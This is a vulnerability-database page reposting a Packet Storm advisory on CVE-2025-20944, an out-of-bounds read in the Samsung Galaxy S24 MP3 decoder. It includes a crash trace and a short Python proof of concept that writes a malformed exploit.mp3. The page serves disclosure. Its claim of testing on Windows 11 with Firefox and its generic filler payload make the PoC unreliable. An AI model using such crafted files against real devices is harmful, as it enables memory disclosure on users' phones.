đ Samsung MP3 Decoder Out-Of-Bounds Read
đď¸Â 10 Feb 2026 00:00:00Reported by indoushkaTypeÂ
 packetstormđ packetstorm.newsđ 152 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2025-20944 | 8 Apr 202504:46 | â | circl | |
| SAMSUNG Mobile devices ĺŽĺ ¨ćźć´ | 8 Apr 202500:00 | â | cnnvd | |
| CVE-2025-20944 | 8 Apr 202504:39 | â | cve | |
| CVE-2025-20944 | 8 Apr 202504:39 | â | cvelist | |
| EUVD-2025-10079 | 3 Oct 202520:07 | â | euvd | |
| CVE-2025-20944 | 8 Apr 202505:15 | â | nvd | |
| Samsung S24 MP3 Decoder Out-Of-Bounds Read | 3 Jun 202500:00 | â | packetstormnews | |
| PT-2025-15345 | 8 Apr 202500:00 | â | ptsecurity | |
| CVE-2025-20944 | 10 Apr 202505:59 | â | redhatcve | |
| CVE-2025-20944 | 8 Apr 202504:39 | â | vulnrichment |
10
=============================================================================================================================================
| # Title : Samsung MP3 Decoder (smp123d_joint_stereo_v1) Out-of-Bounds Read Enabling Potential ASLR Bypass |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://www.samsung.com/us/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/199582/
[+] Summary : An outâofâbounds read vulnerability exists in the Samsung MP3 decoder, specifically in the function smp123d_joint_stereo_v1.
The decoder fails to validate table indices during jointâstereo processing, allowing memory outside the intended buffer to be read. This flaw can cause crashes,
inconsistent audio output, and memory disclosure behavior dependent on the process layout. As a result, the bug may enable partial ASLR bypass when a crafted MP3 file is processed on affected Samsung devices.
The issue affects the Samsung Galaxy S24 (patch level December 1, 2024) and is tracked as CVEâ2025â20944.
#00 pc 0000000000035a1c /vendor/lib64/libsavsac.so
(smp123d_joint_stereo_v1+1436)
(BuildId: df93c19e458701b5125d755553f19288)
[+] There is no public version number for smp123d_joint_stereo_v1 because:
It is not a standalone library.
It is an internal function inside Samsungâs proprietary MP3 decoder.
Samsung does not publish version numbers for these internal codec modules.
[+] Therefore:
The vulnerable version is the MP3 decoder shipped with the Samsung Galaxy S24 series (One UI 6.x / Android 14â15).
Vulnerable Component:
Samsung MP3 Decoder â internal function: smp123d_joint_stereo_v1
Affected Version:
The decoder included in One UI 6.x (2024 firmware) on the S24 family.
[+] POC : python poc.py
import struct
def create_malformed_mp3():
header = b'\xFF\xFB\x90\x00'
malicious_data = b''
for i in range(1000):
malicious_data += struct.pack('>H', 0xFFFF)
return header + malicious_data
with open('exploit.mp3', 'wb') as f:
f.write(create_malformed_mp3())
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.16.2 - 7.1
EPSS0.00159
SSVC